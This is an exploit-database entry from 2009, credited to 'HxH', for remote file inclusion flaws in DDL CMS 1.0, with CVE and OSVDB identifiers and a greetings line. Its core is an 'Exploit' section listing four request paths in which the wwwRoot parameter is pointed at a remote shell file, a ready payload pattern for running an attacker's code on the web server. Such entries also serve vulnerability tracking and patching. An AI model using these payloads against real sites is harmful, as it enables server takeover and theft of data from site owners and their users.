DDL CMS 1.0 - Multiple Remote File Inclusions
Author: HxH
type: webapps
platform: multiple
port:
date_added: 2009-09-20
date_updated:
verified: 1
codes: OSVDB-58291;CVE-2009-3331;OSVDB-58290;OSVDB-58276;OSVDB-58275
tags:
aliases:
screenshot_url:
application_url:
+============================================================+
| |
| DDL CMS 1.0 Multiple Remote File Inclusion Vulnerabilities |
| |
+============================================================+
| |
| Author : HxH |
| |
| E-Mail : HxH[at]live[dot]at |
| |
+------------------------------------------------------------+
| |
| Script : http://www.ddlcms.com/DDLCMS_v1.0.zip |
| |
+------------------------------------------------------------+
| |
| Exploit : |
| |
| /header.php?wwwRoot=[Shell.txt?] |
| |
| /submit.php?wwwRoot=[Shell.txt?] |
| |
| /submitted.php?wwwRoot=[Shell.txt?] |
| |
| /autosubmitter/index.php?wwwRoot=[Shell.txt?] |
| |
+============================================================+
| |
| Greetz : ~ JiKo ~ ThE X ~ TSH ~ All No-Exploit.com Members |
| |
+============================================================+
# milw0rm.com [2009-09-21]